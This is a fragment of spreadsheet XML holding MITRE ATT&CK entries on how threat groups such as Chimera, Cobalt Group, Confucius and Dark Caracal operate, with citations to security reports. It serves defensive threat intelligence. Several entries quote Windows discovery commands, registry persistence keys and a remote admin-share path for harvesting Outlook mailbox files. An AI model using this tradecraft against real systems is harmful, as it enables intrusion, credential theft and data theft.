  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has dumped password hashes for use in pass the hash authentication attacks.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--34cb1bf0-c738-4637-84cc-c0472b105669</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used the NtdsAudit utility to collect information related to accounts and passwords.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--97833e2b-ae08-49c9-bc1f-b1ab03f982d2</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--a8519c68-ab22-4254-bd22-c76b71de1b9e</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</si>
  <si>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</si>
  <si>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relationship--6337cf38-4b52-4e3d-a63e-670e077ec52f</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;tasklist&lt;/code&gt; to enumerate processes.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--58207744-6e31-457e-b36e-b73d60bacd39</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has encapsulated [Cobalt Strike](https://attack.mitre.org/software/S0154)'s C2 protocol in DNS and HTTPS.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--8b769a4e-8898-4995-adc1-4334dc0ec0f7</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</si>
  <si>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</si>
  <si>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relationship--c495478b-6bae-4d1e-a43e-be07fe7cdb48</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has staged stolen data on designated servers in the target environment.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--15ec2486-936e-4bb0-8265-84ba20491c05</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used RDP to access targeted systems.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>relationship--e87cff7f-dc75-4dfc-9c45-ec697ff4644a</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has harvested data from remote mailboxes including through execution of &lt;code&gt;\\&lt;hostname&gt;\c$\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook*.ost&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--c43ac3ee-be59-419e-8ea2-43c04923102f</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has utilized various scans and queries to find domain controllers and remote services in the target environment.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--d45cd2ee-f0f6-417a-98c2-9a7e9f6dc480</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used Windows admin shares to move laterally.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--62a2b674-1eb3-4a9f-ac4f-2766c077eb58</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</si>
  <si>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</si>
  <si>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relationship--1ddc8822-55de-4671-8a73-c95d6383016f</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used [PsExec](https://attack.mitre.org/software/S0029) to deploy beacons on compromised systems.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--23f36f2f-9bc4-4c95-a75b-65e5c74aed88</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has collected documents from the victim's SharePoint.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--7080d506-ac77-4519-93aa-92bc490a2756</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--c3556085-d0ed-41dc-9ed4-a0a0c65ee104</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</si>
  <si>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</si>
  <si>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relationship--817b9a3f-dec4-4269-ab36-4788c6e11c7b</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;netstat -ano | findstr EST&lt;/code&gt; to discover network connections.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--98c1c7ad-db36-459a-ae63-1b92dcb209a5</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has used the &lt;code&gt;quser&lt;/code&gt; command to show currently logged on users.(Citation: NCC Group Chimera January 2021) </t>
  </si>
  <si>
    <t>relationship--85278437-ae97-477e-b7cf-d2bad3fd1c6e</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net use&lt;/code&gt; for system service discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--7944bf15-8e56-4624-8776-bc9fc5aee249</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;time /t&lt;/code&gt; and &lt;code&gt;net time \\ip/hostname&lt;/code&gt; for system time discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--9736ff6e-3b76-47be-a523-3be6076ce5eb</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used a Windows version of the Linux &lt;code&gt;touch&lt;/code&gt; command to modify the date and time stamp on DLLs.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--d275fe0c-3769-4fb1-80ee-2f8477019123</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</si>
  <si>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</si>
  <si>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relationship--cb909b8f-59ba-4edd-ac04-7d9fafdcfe89</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used a valid account to maintain persistence via scheduled task.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>relationship--2fff97fc-650c-4db5-97d4-c36db70077dd</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used HTTPS for C2 communications.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--39da4f4e-e382-4db0-8184-cff27532173f</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used the Windows Command Shell and batch scripts for execution on compromised hosts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--9bbc997d-9ca8-45b9-930a-5bf7e7ec00f8</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used WMIC to execute remote commands.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--e40a416e-ca15-4c15-b469-20549b81e6bd</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used WinRM for lateral movement.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--571c83a5-0a53-4f57-93bc-52356b6cc741</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has used custom tools to facilitate ARP cache poisoning.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--1e03e6e0-8b7b-4e93-a955-245561085aae</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has been known to dump credentials using Mimikatz and Windows Credential Editor.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--1c7b9a1b-e874-4881-884a-e3c3d1fd8aed</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</si>
  <si>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</si>
  <si>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relationship--7dbfb31d-8ac7-44c5-ad9b-f22e07e95d7e</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has created fake LinkedIn profiles that included profile photos, details, and connections.(Citation: Dell Threat Group 2889)</t>
  </si>
  <si>
    <t>relationship--a60c0123-95a3-4409-a60e-354e4237d6cb</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has obtained and used open-source tools such as [PsExec](https://attack.mitre.org/software/S0029), [Windows Credential Editor](https://attack.mitre.org/software/S0005), and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--406e78ba-fc34-4be9-9dcc-323aad40d709</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the Plink utility to create SSH tunnels.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--cfb7e335-e7a3-4dc3-91b8-70381a888222</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has bypassed UAC.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--8b4fd69e-a3c6-4721-9aed-d8235a93672e</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</si>
  <si>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</si>
  <si>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relationship--5dbd040e-0433-42ca-8e03-b3741be31cb2</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>relationship--1010f466-818d-4387-9e43-9ae5e9bf9a40</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has compromised legitimate web browser updates to deliver a backdoor. (Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--23fe4e74-9a8e-40e6-99c0-25eb00775a89</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used DNS tunneling for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--8de247e5-8d6b-4a07-bd65-ba3c3ca57923</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent malicious Word OLE compound documents to victims.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>relationship--4bfaaf99-6884-4df1-af72-0cc61ce50aa0</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</si>
  <si>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</si>
  <si>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relationship--7ec2b835-9c82-4a0a-9730-5f4b87e233f4</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used exploits to increase their levels of rights and privileges.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--5bd3526a-1ae2-4b09-8be7-0eef6ae33155</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) deleted the DLL dropper from the victim’s machine to cover their tracks.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>relationship--88852c38-9aeb-47f4-be63-dc09b8583155</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</si>
  <si>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</si>
  <si>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relationship--07ab4fde-e1fd-4740-863e-c40cc8722d32</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</si>
  <si>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</si>
  <si>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relationship--8e8bebc7-14ff-4c84-a2a4-472446c5897a</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has added persistence by registering the file name for the next stage malware under &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>relationship--f9283994-d216-4796-989d-a375eb4834a9</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.(Citation: Talos Cobalt Group July 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>relationship--5b078c2e-229d-4ef0-8e46-2164354caee9</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</si>
  <si>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</si>
  <si>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relationship--9c8cf20d-b834-4460-a8a8-13d96c19d2ea</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--edcd7a59-f8e0-41e5-b0f5-8d348fa13a10</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used &lt;code&gt;odbcconf&lt;/code&gt; to proxy the execution of malicious DLL files.(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>relationship--1d10495f-64e6-43d9-85cd-4d74a8acdf7c</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</si>
  <si>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</si>
  <si>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relationship--70d1a246-4ff2-452d-babf-ed47bccbf1c4</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has injected code into trusted processes.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--6b083f3f-f8db-403d-b922-308b79d20cc7</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the Plink utility to create SSH tunnels.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--c50f75fe-e7a9-4190-9ca8-a28187955669</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--bd5bc949-6b6b-4511-87f7-3a439a4681da</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used regsvr32.exe to execute scripts.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>relationship--62c5050d-983c-44f7-ba23-f2820398eb67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</si>
  <si>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</si>
  <si>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relationship--e74cdd3d-4ac7-42c5-a7ac-e2f58371fc5b</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used Remote Desktop Protocol to conduct lateral movement.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--78865095-f63e-461c-9e32-e202d514747d</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has created Windows tasks to establish persistence.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--1b1027ff-81d2-4ae9-85ac-0d886dea8a04</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>relationship--30ff291e-e546-4084-8b5b-22fd5a597449</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</si>
  <si>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</si>
  <si>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relationship--029bdc73-5054-45eb-b9d0-e4281f69d85a</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails with URLs pointing to malicious documents.(Citation: Talos Cobalt Group July 2018)(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--95618672-6f7f-4055-9c96-29f75e276d5b</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</si>
  <si>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</si>
  <si>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relationship--7363ed1a-6f75-4ded-9179-2fdba17f6cf1</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</si>
  <si>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</si>
  <si>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relationship--7d115073-c008-4394-867d-07c385d3db87</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--b398ed8d-5801-4cf0-bea2-c8b62c568bcd</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</si>
  <si>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</si>
  <si>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relationship--a0493e99-06ba-4f40-9aae-6f7f9bad6caa</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has created new services to establish persistence.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--d54a98b2-8023-43ac-8577-53796b1efa55</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>relationship--8c13ef6b-5274-4de0-9fad-531b9c87309e</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--985bb7ab-6853-4906-98a0-1945e4504ee8</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has exfiltrated stolen files to its C2 server.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--b148a44c-b4f9-4e19-b6b0-730b83445451</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has exfiltrated victim data to cloud storage service accounts.(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>relationship--2fcc26f7-9da6-4155-af96-b826e2dfe085</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.(Citation: Uptycs Confucius APT Jan 2021)(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>relationship--718b8ec5-a10a-46e1-96e2-14ceb3835b1e</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--d618ef5e-5d76-4014-8c86-9357c4c7f749</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has downloaded additional files and payloads onto a compromised host following initial access.(Citation: Uptycs Confucius APT Jan 2021)(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--95d15400-aa0c-4382-be3f-49f931b81f27</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--f40b2e98-47a9-4cd6-a345-7e4618d896e7</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has lured victims into clicking on a malicious link sent through spearphishing.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--2f14f601-d732-4770-ab76-a7c99627398e</t>
  </si>
  <si>
    <t xml:space="preserve">[Confucius](https://attack.mitre.org/groups/G0142) has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018) </t>
  </si>
  <si>
    <t>relationship--bcb09da2-4ef9-4739-b36d-96c9c62ec4e2</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used PowerShell to execute malicious files and payloads.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--f739246f-dd47-44bf-ae15-74fd7a053c7a</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has dropped malicious files into the startup folder `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` on a compromised host in order to maintain persistence.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--decc0aea-70d2-42b8-8529-3049b9f5937f</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has created scheduled tasks to maintain persistence on a compromised host.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--eca69ead-d0af-4926-9faf-c82baea31296</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has crafted and sent victims malicious attachments to gain initial access.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--6c4c4e5d-0641-4441-a5aa-d27f3362811f</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has sent malicious links to victims through email campaigns.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--0930d98a-d8ae-4300-a50b-8a80b06e88e9</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer that can examine system drives, including those other than the C drive.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>relationship--8135fc16-4dda-4afb-bc35-d24c370b0c53</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a weaponized Microsoft Word document with an embedded RTF exploit.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--38467bd5-4afc-4c64-b8c0-8c7140ac9e58</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used VBScript to execute malicious code.(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>relationship--565d59a0-e2a6-45d2-b655-cff8d02f7ebf</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used HTTP for C2 communications.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--a68cb676-409e-483d-8af1-500d57ad1f81</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has obtained cloud storage service accounts to host stolen data.(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>relationship--9c070a22-d1cc-4565-918f-e0b85fe4bab3</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) encrypts data with a substitute cipher prior to exfiltration.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--292b2a10-ebee-4fbb-b359-2eee16aa46ba</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) uses ZPP, a .NET console program, to compress files with ZIP.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--2e82ef21-9fb2-421e-bd96-73599089b448</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) digitally signed an executable with a stolen certificate from legitimate company AI Squared.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--f6915cfa-4c11-4830-bcd8-aa648596b895</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used &lt;code&gt;-w hidden&lt;/code&gt; and &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--948a5d37-65d1-403f-99bb-0f08186aeebc</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used PowerShell Empire.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--2f68f61d-07e1-4181-a26c-93433f9f0db7</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used the AirVPN service for operational activity.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--3393682e-22a6-4e27-b890-747f1392741b</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--896cd1de-ffa7-4f69-a981-2859cc756601</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used Metasploit, [Empire](https://attack.mitre.org/software/S0363), and AirVPN for post-exploitation activities.(Citation: ClearSky and Trend Micro Operation Wilted Tulip July 2017)(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--d35934e8-c16e-4820-a0ad-88e0eff27554</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) leveraged a compiled HTML file that contained a command to download and run an executable.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--543dce32-6988-4e49-ad83-4405d1a143ae</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) collected complete contents of the 'Pictures' folder from compromised Windows systems.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ea9d456c-f2b7-4d95-ab30-2a7e06586615</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) leveraged a watering hole to serve up malicious code.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--5ade424d-5a9d-4209-8aa4-a129783ffaa3</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) collected file listings of all default Windows directories.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--79826a7e-d9dd-4c4f-bc1f-e5f2d4c6465b</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--285ab221-15cf-4215-aa68-a8e74b635633</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) has obfuscated strings in [Bandook](https://attack.mitre.org/software/S0234) by base64 encoding, and then encrypting them.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--0c533013-a72e-4aef-bd19-8ea9ea415189</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070)'s version of [Bandook](https://attack.mitre.org/software/S0234) adds a registry key to &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--74fd87b9-3aff-4278-a408-11ae470082e5</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) took screenshots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ec8f73de-eab1-4d3b-88c0-7885716aa748</t>
  </si>
  <si>
    <t>03 June 2020</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) has used UPX to pack [Bandook](https://attack.mitre.org/software/S0234).(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--31fb3ebe-3fc9-4257-b7d5-a1b12b54bbe3</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) spearphished victims via Facebook and Whatsapp.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--b4174e7a-3b60-4697-a006-84edb81622cd</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070)'s version of [Bandook](https://attack.mitre.org/software/S0234) communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&amp;&amp;&amp;”.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--23c6c48b-f602-43f9-9c23-d4e46fba9194</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) has used macros in Word documents that would download a second stage if executed.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--1ba80112-ffca-4c7e-ae63-fcbe3b9e689d</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) used [Template Injection](https://attack.mitre.org/techniques/T1221) to launch an authentication window for users to enter their credentials.(Citation: Unit 42 Phishery Aug 2018)</t>
  </si>
  <si>
    <t>relationship--2db02b07-4dd3-4810-9103-1f8d7bd46a60</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has used &lt;code&gt;-WindowStyle Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--ab3cf933-236f-4255-9ca6-24826f9bbe99</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--2b91534d-4687-457b-bcb0-96be9357fa6d</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) leveraged PowerShell to download and execute additional scripts for execution.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--da3fc762-2ac5-4ab7-8c77-6df2f06b5680</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</si>
  <si>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</si>
  <si>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relationship--e3425903-a09d-44e2-b033-daadc8208ff5</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</si>
  <si>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</si>
  <si>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relationship--e3a3186e-2ce7-4d46-836e-dc024464ede7</t>
  </si>
  <si>
